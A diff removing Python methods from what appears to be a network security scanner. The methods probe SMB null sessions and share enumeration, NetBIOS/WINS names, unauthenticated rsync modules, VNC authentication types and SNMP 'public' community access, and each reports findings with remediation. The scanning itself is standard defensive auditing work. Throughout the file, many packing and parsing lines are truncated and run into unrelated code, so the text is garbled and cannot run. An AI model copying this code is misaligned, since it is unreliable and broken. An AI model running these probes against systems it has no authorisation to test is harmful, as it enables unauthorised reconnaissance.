cwe_id="CWE-287", - confidence="certain", - )) - - return probe_result(raw_data=result, findings=findings) - - - def _service_info_smb(self, target, port): # default port: 445 - """ - Probe SMB services: dialect negotiation, version extraction, CVE matching, - null session test, and security flag analysis. - - Checks performed: - - 1. SMB negotiate — determine supported dialect (SMBv1/v2/v3). - 2. Version extraction — parse Samba/Windows version from NativeOS/NativeLanMan. - 3. Security flags — check signing requirements. - 4. Null session — attempt anonymous IPC$ access. - 5. CVE matching — run check_cves on extracted Samba version. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = { - "banner": None, "dialect": None, "server_os": None, - "server_domain": None, "samba_version": None, - "signing_required": None, "smbv1_supported": False, - } - - # --- 1. SMBv1 Negotiate --- - # Build a proper SMBv1 Negotiate Protocol Request with NT LM 0.12 dialect - dialects = b"\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" - smb_header = bytearray(32) - smb_header[0:4] = b"\xffSMB" # Protocol ID - smb_header[4] = 0x72 # Command: Negotiate - # Flags: 0x18 (case-sensitive, canonicalized paths) - smb_header[13] = 0x18 - # Flags2: unicode + NT status + long names - struct.pack_into("I", len(smb_payload)) - netbios_header = b"\x00" + netbios_header[1:] # force type=0 - - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(4) - sock.connect((target, port)) - sock.sendall(netbios_header + smb_payload) - - # Read NetBIOS header (4 bytes) + full response - resp_hdr = self._smb_recv_exact(sock, 4) - if not resp_hdr: - sock.close() - findings.append(Finding( - severity=Severity.INFO, - title="SMB port open but no negotiation response", - description=f"Port {port} is open but SMB did not respond to negotiation.", - confidence="tentative", - )) - return probe_result(raw_data=raw, findings=findings) - - resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] - resp_data = self._smb_recv_exact(sock, min(resp_len, 4096)) - sock.close() - - if not resp_data or len(resp_data) < 36: - raw["banner"] = "SMB response too short" - findings.append(Finding( - severity=Severity.MEDIUM, - title="SMB service responded to negotiation probe", - description=f"SMB on {target}:{port} accepts negotiation requests.", - evidence=f"Response: {(resp_data or b'').hex()[:48]}", - remediation="Restrict SMB access to trusted networks; disable SMBv1.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - return probe_result(raw_data=raw, findings=findings) - - # Check if SMBv1 or SMBv2 response - protocol_id = resp_data[0:4] - - if protocol_id == b"\xffSMB": - # --- SMBv1 response --- - raw["smbv1_supported"] = True - raw["banner"] = "SMBv1 negotiation response received" - - # Parse negotiate response body (after 32-byte header) - if len(resp_data) >= 37: - word_count = resp_data[32] - if word_count >= 17 and len(resp_data) >= 32 + 1 + 34: - words_start = 33 - dialect_idx = struct.unpack_from("= 17 and len(resp_data) >= words_start + 2 + 22 + 2: - sec_blob_len = struct.unpack_from("= 1: - raw["server_domain"] = parts[0] - if len(parts) >= 2: - raw["server_name"] = parts[1] - except Exception: - pass - - # SMBv1 is a security concern - findings.append(Finding( - severity=Severity.MEDIUM, - title="SMBv1 protocol supported (legacy, attack surface for MS17-010)", - description=f"SMB on {target}:{port} supports SMBv1, which is vulnerable to " - "EternalBlue (MS17-010) and other SMBv1-specific attacks.", - evidence=f"Negotiated dialect: {raw['dialect']}, SMBv1 response received.", - remediation="Disable SMBv1 on the server (e.g., 'server min protocol = SMB2' in smb.conf).", - owasp_id="A06:2021", - cwe_id="CWE-757", - confidence="certain", - )) - - elif protocol_id == b"\xfeSMB": - # --- SMBv2/3 response --- - raw["banner"] = "SMBv2 negotiation response received" - if len(resp_data) >= 72: - smb2_dialect = struct.unpack_from(" Session Setup (null) -> Tree Connect IPC$ -> - Open \\srvsvc pipe -> DCE/RPC Bind -> NetShareEnumAll -> parse results. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - SMB port (typically 445). - - Returns - ------- - list[dict] - Each dict has keys ``name`` (str), ``type`` (int), ``comment`` (str). - Returns empty list on any failure. - """ - sock = None - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(4) - sock.connect((target, port)) - - def _send_smb(payload): - nb_hdr = b"\x00" + struct.pack(">I", len(payload))[1:] - sock.sendall(nb_hdr + payload) - - def _recv_smb(): - resp_hdr = self._smb_recv_exact(sock, 4) - if not resp_hdr: - return None - resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] - return self._smb_recv_exact(sock, min(resp_len, 65536)) - - # ---- 1. Negotiate (NT LM 0.12) ---- - dialects = b"\x02NT LM 0.12\x00" - smb_hdr = bytearray(32) - smb_hdr[0:4] = b"\xffSMB" - smb_hdr[4] = 0x72 # Negotiate - smb_hdr[13] = 0x18 - struct.pack_into(" len(enum_resp): - data_len = len(enum_resp) - data_off - if data_off >= len(enum_resp) or data_len < 24: - return [] - - dce_data = enum_resp[data_off:data_off + data_len] - - # DCE/RPC response header is 24 bytes, then stub data - if len(dce_data) < 24: - return [] - dce_stub = dce_data[24:] - - return self._parse_netshareenumall_response(dce_stub) - - except Exception: - return [] - finally: - if sock: - try: - sock.close() - except Exception: - pass - - @staticmethod - def _parse_netshareenumall_response(stub): - """Parse NetShareEnumAll DCE/RPC stub response into share list. - - Parameters - ---------- - stub : bytes - DCE/RPC stub data (after the 24-byte response header). - - Returns - ------- - list[dict] - Each dict: {"name": str, "type": int, "comment": str}. - """ - shares = [] - try: - if len(stub) < 20: - return [] - - # Response stub layout: - # [4] info_level - # [4] switch_value - # [4] referent pointer for SHARE_INFO_1_CONTAINER - # [4] entries_read - # [4] referent pointer for array - # Then for each entry: [4] name_ptr, [4] type, [4] comment_ptr - # Then the actual strings (NDR conformant arrays) - - offset = 0 - offset += 4 # info_level - offset += 4 # switch_value - offset += 4 # referent pointer - if offset + 4 > len(stub): - return [] - entries_read = struct.unpack_from(" 500: - return [] - - offset += 4 # array referent pointer - offset += 4 # max count (NDR array header) - - # Read the fixed-size entries: name_ptr(4) + type(4) + comment_ptr(4) each - entry_records = [] - for _ in range(entries_read): - if offset + 12 > len(stub): - break - name_ptr = struct.unpack_from(" len(data): - return "", off - max_count = struct.unpack_from(" len(data): - s = data[off:].decode("utf-16-le", errors="ignore").rstrip("\x00") - return s, len(data) - s = data[off:off + byte_len].decode("utf-16-le", errors="ignore").rstrip("\x00") - off += byte_len - # Align to 4-byte boundary - if off % 4: - off += 4 - (off % 4) - return s, off - - for name_ptr, share_type, comment_ptr in entry_records: - name, offset = read_ndr_string(stub, offset) - comment, offset = read_ndr_string(stub, offset) - if name: - shares.append({ - "name": name, - "type": share_type, - "comment": comment, - }) - - except Exception: - pass - return shares - - def _smb_try_null_session(self, target, port): - """Attempt SMBv1 null session to extract Samba version from SessionSetup response. - - Returns - ------- - str or None - Extracted Samba version string (e.g. '4.6.3'), or None. - """ - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - - # --- Negotiate --- - dialects = b"\x02NT LM 0.12\x00" - smb_header = bytearray(32) - smb_header[0:4] = b"\xffSMB" - smb_header[4] = 0x72 # Negotiate - smb_header[13] = 0x18 - struct.pack_into("I", len(payload))[1:] - sock.sendall(nb_hdr + payload) - - # Read negotiate response - resp_hdr = self._smb_recv_exact(sock, 4) - if not resp_hdr: - sock.close() - return None - resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] - self._smb_recv_exact(sock, min(resp_len, 4096)) - - # --- Session Setup AndX (null session) --- - smb_header2 = bytearray(32) - smb_header2[0:4] = b"\xffSMB" - smb_header2[4] = 0x73 # Session Setup AndX - smb_header2[13] = 0x18 - struct.pack_into("I", len(payload2))[1:] - sock.sendall(nb_hdr2 + payload2) - - # Read session setup response - resp_hdr2 = self._smb_recv_exact(sock, 4) - if not resp_hdr2: - sock.close() - return None - resp_len2 = struct.unpack(">I", b"\x00" + resp_hdr2[1:4])[0] - resp_data2 = self._smb_recv_exact(sock, min(resp_len2, 4096)) - sock.close() - - if not resp_data2: - return None - - # Extract NativeOS string — contains "Samba x.y.z" or "Windows ..." - # Search the response bytes for "Samba" followed by a version - resp_text = resp_data2.decode("utf-8", errors="ignore") - samba_match = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text) - if samba_match: - return samba_match.group(1) - - # Also try UTF-16-LE decoding - resp_text_u16 = resp_data2.decode("utf-16-le", errors="ignore") - samba_match_u16 = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text_u16) - if samba_match_u16: - return samba_match_u16.group(1) - - except Exception: - pass - return None - - - # NetBIOS name suffix → human-readable type - _NBNS_SUFFIX_TYPES = { - 0x00: "Workstation", - 0x03: "Messenger (logged-in user)", - 0x20: "File Server (SMB sharing)", - 0x1C: "Domain Controller", - 0x1B: "Domain Master Browser", - 0x1E: "Browser Election Service", - } - - def _service_info_wins(self, target, port): # ports: 42 (WINS/TCP), 137 (NBNS/UDP) - """ - Probe WINS / NetBIOS Name Service for name enumeration and service detection. - - Port 42 (TCP): WINS replication — sends MS-WINSRA Association Start Request - to fingerprint the service and extract NBNS version. Also fires a UDP - side-probe to port 137 for NetBIOS name enumeration. - Port 137 (UDP): NBNS — sends wildcard node-status query (RFC 1002) to - enumerate registered NetBIOS names. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None, "netbios_names": [], "wins_responded": False} - - # -- Build NetBIOS wildcard node-status query (RFC 1002) -- - tid = struct.pack('>H', random.randint(0, 0xFFFF)) - # Flags: 0x0010 (recursion desired) - # Questions: 1, Answers/Auth/Additional: 0 - header = tid + struct.pack('>HHHHH', 0x0010, 1, 0, 0, 0) - # Encoded wildcard name "*" (first-level NetBIOS encoding) - # '*' (0x2A) → half-bytes 0x02, 0x0A → chars 'C','K', padded with 'A' (0x00 half-bytes) - qname = b'\x20' + b'CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + b'\x00' - # Type: NBSTAT (0x0021), Class: IN (0x0001) - question = struct.pack('>HH', 0x0021, 0x0001) - nbns_query = header + qname + question - - def _parse_nbns_response(data): - """Parse a NetBIOS node-status response and return list of (name, suffix, flags).""" - names = [] - if len(data) < 14: - return names - # Verify transaction ID matches - if data[:2] != tid: - return names - ancount = struct.unpack('>H', data[6:8])[0] - if ancount == 0: - return names - # Skip past header (12 bytes) then answer name (compressed pointer or full) - idx = 12 - if idx < len(data) and data[idx] & 0xC0 == 0xC0: - idx += 2 - else: - while idx < len(data) and data[idx] != 0: - idx += data[idx] + 1 - idx += 1 - # Type (2) + Class (2) + TTL (4) + RDLength (2) = 10 bytes - if idx + 10 > len(data): - return names - idx += 10 - if idx >= len(data): - return names - num_names = data[idx] - idx += 1 - # Each name entry: 15 bytes name + 1 byte suffix + 2 bytes flags = 18 bytes - for _ in range(num_names): - if idx + 18 > len(data): - break - name_bytes = data[idx:idx + 15] - suffix = data[idx + 15] - flags = struct.unpack('>H', data[idx + 16:idx + 18])[0] - name = name_bytes.decode('ascii', errors='ignore').rstrip() - names.append((name, suffix, flags)) - idx += 18 - return names - - def _udp_nbns_probe(udp_port): - """Send UDP NBNS wildcard query, return parsed names or empty list.""" - sock = None - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(3) - sock.sendto(nbns_query, (target, udp_port)) - data, _ = sock.recvfrom(1024) - return _parse_nbns_response(data) - except Exception: - return [] - finally: - if sock is not None: - sock.close() - - def _add_nbns_findings(names, probe_label): - """Populate raw data and findings from enumerated NetBIOS names.""" - raw["netbios_names"] = [ - {"name": n, "suffix": f"0x{s:02X}", "type": self._NBNS_SUFFIX_TYPES.get(s, f"Unknown(0x{s:02X})")} - for n, s, _f in names - ] - name_list = "; ".join( - f"{n} <{s:02X}> ({self._NBNS_SUFFIX_TYPES.get(s, 'unknown')})" - for n, s, _f in names - ) - findings.append(Finding( - severity=Severity.HIGH, - title="NetBIOS name enumeration successful", - description=( - f"{probe_label} responded to a wildcard node-status query, " - "leaking computer name, domain membership, and potentially logged-in users." - ), - evidence=f"Names: {name_list[:200]}", - remediation="Block UDP port 137 at the firewall; disable NetBIOS over TCP/IP in network adapter settings.", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - findings.append(Finding( - severity=Severity.INFO, - title=f"NetBIOS names discovered ({len(names)} entries)", - description=f"Enumerated names: {name_list}", - evidence=f"Names: {name_list[:300]}", - confidence="certain", - )) - - try: - if port == 137: - # -- Direct UDP NBNS probe -- - names = _udp_nbns_probe(137) - if names: - raw["banner"] = f"NBNS: {len(names)} name(s) enumerated" - _add_nbns_findings(names, f"NBNS on {target}:{port}") - else: - raw["banner"] = "NBNS port open (no response to wildcard query)" - findings.append(Finding( - severity=Severity.INFO, - title="NBNS port open but no names returned", - description=f"UDP port {port} on {target} did not respond to NetBIOS wildcard query.", - confidence="tentative", - )) - else: - # -- TCP WINS replication probe (MS-WINSRA Association Start Request) -- - # Also attempt UDP NBNS side-probe to port 137 for name enumeration - names = _udp_nbns_probe(137) - if names: - _add_nbns_findings(names, f"NBNS side-probe to {target}:137") - - # Build MS-WINSRA Association Start Request per [MS-WINSRA] §2.2.3: - # Common Header (16 bytes): - # Packet Length: 41 (0x00000029) — excludes this field - # Reserved: 0x00007800 (opcode, ignored by spec) - # Destination Assoc Handle: 0x00000000 (first message, unknown) - # Message Type: 0x00000000 (Association Start Request) - # Body (25 bytes): - # Sender Assoc Handle: random 4 bytes - # NBNS Major Version: 2 (required) - # NBNS Minor Version: 5 (Win2k+) - # Reserved: 21 zero bytes (pad to 41) - sender_ctx = random.randint(1, 0xFFFFFFFF) - wrepl_header = struct.pack('>I', 41) # Packet Length - wrepl_header += struct.pack('>I', 0x00007800) # Reserved / opcode - wrepl_header += struct.pack('>I', 0) # Destination Assoc Handle - wrepl_header += struct.pack('>I', 0) # Message Type: Start Request - wrepl_body = struct.pack('>I', sender_ctx) # Sender Assoc Handle - wrepl_body += struct.pack('>HH', 2, 5) # Major=2, Minor=5 - wrepl_body += b'\x00' * 21 # Reserved padding - wrepl_packet = wrepl_header + wrepl_body - - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - sock.sendall(wrepl_packet) - - # Distinguish three recv outcomes: - # data received → parse as WREPL (confirmed WINS) - # timeout → connection held open, no reply (likely WINS, non-partner) - # empty / closed → server sent FIN immediately (unconfirmed service) - data = None - recv_timed_out = False - try: - data = sock.recv(1024) - except socket.timeout: - recv_timed_out = True - finally: - sock.close() - - if data and len(data) >= 20: - raw["wins_responded"] = True - # Parse response: first 4 bytes = Packet Length, next 16 = common header - resp_msg_type = struct.unpack('>I', data[12:16])[0] if len(data) >= 16 else None - version_info = "" - if resp_msg_type == 1 and len(data) >= 24: - # Association Start Response — extract version - resp_major = struct.unpack('>H', data[20:22])[0] if len(data) >= 22 else None - resp_minor = struct.unpack('>H', data[22:24])[0] if len(data) >= 24 else None - if resp_major is not None: - version_info = f" (NBNS version {resp_major}.{resp_minor})" - raw["nbns_version"] = {"major": resp_major, "minor": resp_minor} - raw["banner"] = f"WINS replication service{version_info}" - findings.append(Finding( - severity=Severity.MEDIUM, - title="WINS replication service exposed", - description=( - f"WINS on {target}:{port} responded to a WREPL Association Start Request{version_info}. " - "WINS is a legacy name-resolution service vulnerable to spoofing, enumeration, and " - "multiple remote code execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924). " - "It should not be accessible from untrusted networks." - ), - evidence=f"WREPL response ({len(data)} bytes): {data[:24].hex()}", - remediation=( - "Decommission WINS or restrict TCP port 42 to trusted replication partners. " - "If WINS is required, apply all patches (MS04-045, MS09-039) and set the registry key " - "RplOnlyWCnfPnrs=1 to accept replication only from configured partners." - ), - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - elif data: - # Got some data but not enough for a valid WREPL response - raw["wins_responded"] = True - raw["banner"] = f"Port {port} responded ({len(data)} bytes, non-WREPL)" - findings.append(Finding( - severity=Severity.LOW, - title=f"Service on port {port} responded but is not standard WINS", - description=( - f"TCP port {port} on {target} returned data that does not match the " - "WINS replication protocol (MS-WINSRA). Another service may be listening." - ), - evidence=f"Response ({len(data)} bytes): {data[:32].hex()}", - confidence="tentative", - )) - elif recv_timed_out: - # Connection accepted AND held open after our WREPL packet, but no - # reply — consistent with WINS silently dropping a non-partner request - # (RplOnlyWCnfPnrs=1). A non-WINS service would typically RST or FIN. - raw["banner"] = "WINS likely (connection held, no WREPL reply)" - findings.append(Finding( - severity=Severity.MEDIUM, - title="WINS replication port open (non-partner rejected)", - description=( - f"TCP port {port} on {target} accepted a WREPL Association Start Request " - "and held the connection open without responding, consistent with a WINS " - "server configured to reject non-partner replication (RplOnlyWCnfPnrs=1). " - "An exposed WINS port is a legacy attack surface subject to remote code " - "execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924)." - ), - evidence="TCP connection accepted and held open; WREPL handshake: no reply after 3 s", - remediation=( - "Block TCP port 42 at the firewall if WINS replication is not needed. " - "If required, restrict to trusted replication partners only." - ), - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="firm", - )) - else: - # recv returned empty — server immediately closed the connection. - # Cannot confirm WINS; don't produce a finding. The port scan - # already reports the open port; a "service unconfirmed" finding - # adds no actionable value to the report. - pass - except Exception as e: - return probe_error(target, port, "WINS/NBNS", e) - - if not findings: - # Could not confirm WINS — downgrade the protocol label so the UI - # does not display an unverified "WINS" tag from WELL_KNOWN_PORTS. - port_protocols = self.state.get("port_protocols") - if port_protocols and port_protocols.get(port) in ("wins", "nbns"): - port_protocols[port] = "unknown" - return None - - return probe_result(raw_data=raw, findings=findings) - - def _service_info_rsync(self, target, port): # default port: 873 - """ - Rsync service probe: version handshake, module enumeration, auth check. - - Checks performed: - - 1. Banner grab — extract rsync protocol version. - 2. Module enumeration — ``#list`` to discover available modules. - 3. Auth check — connect to each module to test unauthenticated access. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"version": None, "modules": []} - - # --- 1. Connect and receive banner --- - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - banner = sock.recv(256).decode("utf-8", errors="ignore").strip() - except Exception as e: - return probe_error(target, port, "rsync", e) - - if not banner.startswith("@RSYNCD:"): - try: - sock.close() - except Exception: - pass - findings.append(Finding( - severity=Severity.INFO, - title=f"Port {port} open but no rsync banner", - description=f"Expected @RSYNCD banner, got: {banner[:80]}", - confidence="tentative", - )) - return probe_result(raw_data=raw, findings=findings) - - # Extract protocol version - proto_version = banner.split(":", 1)[1].strip().split()[0] if ":" in banner else None - raw["version"] = proto_version - - findings.append(Finding( - severity=Severity.LOW, - title=f"Rsync service detected (protocol {proto_version})", - description=f"Rsync daemon is running on {target}:{port}.", - evidence=f"Banner: {banner}", - remediation="Restrict rsync access to trusted networks; require authentication for all modules.", - cwe_id="CWE-200", - confidence="certain", - )) - - # --- 2. Module enumeration --- - try: - # Send matching version handshake + list request - sock.sendall(f"@RSYNCD: {proto_version}\n".encode()) - sock.sendall(b"#list\n") - # Read module listing until @RSYNCD: EXIT - module_data = b"" - while True: - chunk = sock.recv(4096) - if not chunk: - break - module_data += chunk - if b"@RSYNCD: EXIT" in module_data: - break - sock.close() - - modules = [] - for line in module_data.decode("utf-8", errors="ignore").splitlines(): - line = line.strip() - if line.startswith("@RSYNCD:") or not line: - continue - # Format: "module_name\tdescription" or just "module_name" - parts = line.split("\t", 1) - mod_name = parts[0].strip() - mod_desc = parts[1].strip() if len(parts) > 1 else "" - if mod_name: - modules.append({"name": mod_name, "description": mod_desc}) - - raw["modules"] = modules - - if modules: - mod_names = ", ".join(m["name"] for m in modules) - findings.append(Finding( - severity=Severity.HIGH, - title=f"Rsync module enumeration successful: {mod_names}", - description=f"Rsync on {target}:{port} exposes {len(modules)} module(s). " - "Exposed modules may allow file read/write.", - evidence=f"Modules: {mod_names}", - remediation="Restrict module listing and require authentication for all rsync modules.", - owasp_id="A01:2021", - cwe_id="CWE-200", - confidence="certain", - )) - except Exception as e: - self.P(f"Rsync module enumeration failed on {target}:{port}: {e}", color='y') - try: - sock.close() - except Exception: - pass - - # --- 3. Test unauthenticated access per module --- - for mod in raw["modules"]: - try: - sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock2.settimeout(3) - sock2.connect((target, port)) - sock2.recv(256) # banner - sock2.sendall(f"@RSYNCD: {proto_version}\n".encode()) - sock2.sendall(f"{mod['name']}\n".encode()) - resp = sock2.recv(4096).decode("utf-8", errors="ignore") - sock2.close() - - if "@RSYNCD: OK" in resp: - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"Rsync module '{mod['name']}' accessible without authentication", - description=f"Module '{mod['name']}' on {target}:{port} allows unauthenticated access. " - "An attacker can read or write arbitrary files within this module.", - evidence=f"Connected to module '{mod['name']}', received @RSYNCD: OK", - remediation=f"Add 'auth users' and 'secrets file' to the [{mod['name']}] section in rsyncd.conf.", - owasp_id="A01:2021", - cwe_id="CWE-284", - confidence="certain", - )) - elif "@ERROR" in resp and "auth" in resp.lower(): - raw["modules"] = [ - {**m, "auth_required": True} if m["name"] == mod["name"] else m - for m in raw["modules"] - ] - except Exception: - pass - - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_vnc(self, target, port): # default port: 5900 - """ - VNC handshake: read version banner, negotiate security types. - - Security types: - 1 (None) → CRITICAL: unauthenticated desktop access - 2 (VNC Auth) → MEDIUM: DES-based, max 8-char password - 19 (VeNCrypt) → INFO: TLS-secured - Other → LOW: unknown auth type - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None, "security_types": []} - - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - - # Read server banner (e.g. "RFB 003.008\n") - banner = sock.recv(12).decode('ascii', errors='ignore').strip() - raw["banner"] = banner - - if not banner.startswith("RFB"): - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"VNC service detected (non-standard banner: {banner[:30]})", - description="VNC port open but banner is non-standard.", - evidence=f"Banner: {banner}", - remediation="Restrict VNC access to trusted networks or use SSH tunneling.", - confidence="tentative", - )) - sock.close() - return probe_result(raw_data=raw, findings=findings) - - # Echo version back to negotiate - sock.sendall(banner.encode('ascii') + b"\n") - - # Read security type list - sec_data = sock.recv(64) - sec_types = [] - if len(sec_data) >= 1: - num_types = sec_data[0] - if num_types > 0 and len(sec_data) >= 1 + num_types: - sec_types = list(sec_data[1:1 + num_types]) - raw["security_types"] = sec_types - sock.close() - - _VNC_TYPE_NAMES = {1: "None", 2: "VNC Auth", 19: "VeNCrypt", 16: "Tight"} - type_labels = [f"{t}({_VNC_TYPE_NAMES.get(t, 'unknown')})" for t in sec_types] - raw["security_type_labels"] = type_labels - - if 1 in sec_types: - findings.append(Finding( - severity=Severity.CRITICAL, - title="VNC unauthenticated access (security type None)", - description=f"VNC on {target}:{port} allows connections without authentication.", - evidence=f"Banner: {banner}, security types: {type_labels}", - remediation="Disable security type None and require VNC Auth or VeNCrypt.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - if 2 in sec_types: - findings.append(Finding( - severity=Severity.MEDIUM, - title="VNC password auth (DES-based, max 8 chars)", - description=f"VNC Auth uses DES encryption with a maximum 8-character password.", - evidence=f"Banner: {banner}, security types: {type_labels}", - remediation="Use VeNCrypt (TLS) or SSH tunneling instead of plain VNC Auth.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - if 19 in sec_types: - findings.append(Finding( - severity=Severity.INFO, - title="VNC VeNCrypt (TLS-secured)", - description="VeNCrypt provides TLS-secured VNC connections.", - evidence=f"Banner: {banner}, security types: {type_labels}", - confidence="certain", - )) - if not sec_types: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"VNC service exposed: {banner}", - description="VNC protocol banner detected but security types could not be parsed.", - evidence=f"Banner: {banner}", - remediation="Restrict VNC access to trusted networks.", - confidence="firm", - )) - - except Exception as e: - return probe_error(target, port, "VNC", e) - - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_snmp(self, target, port): # default port: 161 - """ - Attempt SNMP community string disclosure using 'public'. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None} - sock = None - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(2) - packet = bytes.fromhex( - "302e020103300702010304067075626c6963a019020405f5e10002010002010030100406082b060102010101000500" - ) - sock.sendto(packet, (target, port)) - data, _ = sock.recvfrom(512) - readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) - if 'public' in readable.lower(): - raw["banner"] = readable.strip()[:120] - findings.append(Finding( - severity=Severity.HIGH, - title="SNMP default community string 'public' accepted", - description="SNMP agent responds to the default 'public' community string, " - "allowing unauthenticated read access to device configuration and network data.", - evidence=f"Response: {readable.strip()[:80]}", - remediation="Change the community string from 'public' to a strong value; migrate to SNMPv3.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - # Walk system MIB for additional intel - mib_result = self._snmp_walk_system_mib(target, port) - if mib_result: - sys_info = mib_result.get("system", {}) - raw.update(sys_info) - findings.extend(mib_result.get("findings", [])) - else: - raw["banner"] = readable.strip()[:120] - findings.append(Finding( - severity=Severity.INFO, - title="SNMP service responded", - description=f"SNMP agent on {target}:{port} responded but did not accept 'public' community.", - evidence=f"Response: {readable.strip()[:80]}", - confidence="firm", - )) - except socket.timeout: - return probe_error(target, port, "SNMP", Exception("timed out")) - except Exception as e: - return probe_error(target, port, "SNMP", e) - finally: - if sock is not None: - sock.close() - return probe_result(raw_data=raw, findings=findings) - - # -- SNMP MIB walk helpers ------------------------------------------------ - - _ICS_KEYWORDS = frozenset({ - "siemens", "simatic", "schneider", "allen-bradley", "honeywell", - "abb", "modicon", "rockwell", "yokogawa", "emerson", "ge fanuc", - }) - - def _is_ics_indicator(self, text): - lower = text.lower() - return any(kw in lower for kw in self._ICS_KEYWORDS) - - @staticmethod - def _snmp_encode_oid(oid_str): - parts = [int(p) for p in oid_str.split(".")] - body = bytes([40 * parts[0] + parts[1]]) - for v in parts[2:]: - if v < 128: - body += bytes([v]) - else: - chunks = [] - chunks.append(v & 0x7F) - v >>= 7 - while v: - chunks.append(0x80 | (v & 0x7F)) - v >>= 7 - body += bytes(reversed(chunks)) - return body - - def _snmp_build_getnext(self, community, oid_str, request_id=1): - oid_body = self._snmp_encode_oid(oid_str) - oid_tlv = bytes([0x06, len(oid_body)]) + oid_body - varbind = bytes([0x30, len(oid_tlv) + 2]) + oid_tlv + b"\x05\x00" - varbind_seq = bytes([0x30, len(varbind)]) + varbind - req_id = bytes([0x02, 0x01, request_id & 0xFF]) - err_status = b"\x02\x01\x00" - err_index = b"\x02\x01\x00" - pdu_body = req_id + err_status + err_index + varbind_seq - pdu = bytes([0xA1, len(pdu_body)]) + pdu_body - version = b"\x02\x01\x00" - comm = bytes([0x04, len(community)]) + community.encode() - inner = version + comm + pdu - return bytes([0x30, len(inner)]) + inner - - @staticmethod - def _snmp_parse_response(data): - try: - pos = 0 - if data[pos] != 0x30: - return None, None - pos += 2 # skip SEQUENCE tag + length - # skip version - if data[pos] != 0x02: - return None, None - pos += 2 + data[pos + 1] - # skip community - if data[pos] != 0x04: - return None, None - pos += 2 + data[pos + 1] - # response PDU (0xA2) - if data[pos] != 0xA2: - return None, None - pos += 2 - # skip request-id, error-status, error-index (3 integers) - for _ in range(3): - pos += 2 + data[pos + 1] - # varbind list SEQUENCE - pos += 2 # skip SEQUENCE tag + length - # first varbind SEQUENCE - pos += 2 # skip SEQUENCE tag + length - # OID - if data[pos] != 0x06: - return None, None - oid_len = data[pos + 1] - oid_bytes = data[pos + 2: pos + 2 + oid_len] - # decode OID - parts = [str(oid_bytes[0] // 40), str(oid_bytes[0] % 40)] - i = 1 - while i < len(oid_bytes): - if oid_bytes[i] < 128: - parts.append(str(oid_bytes[i])) - i += 1 - else: - val = 0 - while i < len(oid_bytes) and oid_bytes[i] & 0x80: - val = (val << 7) | (oid_bytes[i] & 0x7F) - i += 1 - if i < len(oid_bytes): - val = (val << 7) | oid_bytes[i] - i += 1 - parts.append(str(val)) - oid_str = ".".join(parts) - pos += 2 + oid_len - # value - val_tag = data[pos] - val_len = data[pos + 1] - val_raw = data[pos + 2: pos + 2 + val_len] - if val_tag == 0x04: # OCTET STRING - value = val_raw.decode("utf-8", errors="replace") - elif val_tag == 0x02: # INTEGER - value = str(int.from_bytes(val_raw, "big", signed=True)) - elif val_tag == 0x43: # TimeTicks - value = str(int.from_bytes(val_raw, "big")) - elif val_tag == 0x40: # IpAddress (APPLICATION 0) - if len(val_raw) == 4: - value = ".".join(str(b) for b in val_raw) - else: - value = val_raw.hex() - else: - value = val_raw.hex() - return oid_str, value - except Exception: - return None, None - - _SYSTEM_OID_NAMES = { - "1.3.6.1.2.1.1.1": "sysDescr", - "1.3.6.1.2.1.1.3": "sysUpTime", - "1.3.6.1.2.1.1.4": "sysContact", - "1.3.6.1.2.1.1.5": "sysName", - "1.3.6.1.2.1.1.6": "sysLocation", - } - - def _snmp_walk_system_mib(self, target, port): - import ipaddress as _ipaddress - system = {} - walk_findings = [] - sock = None - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - sock.settimeout(2) - - def _walk(prefix): - oid = prefix - results = [] - for _ in range(20): - pkt = 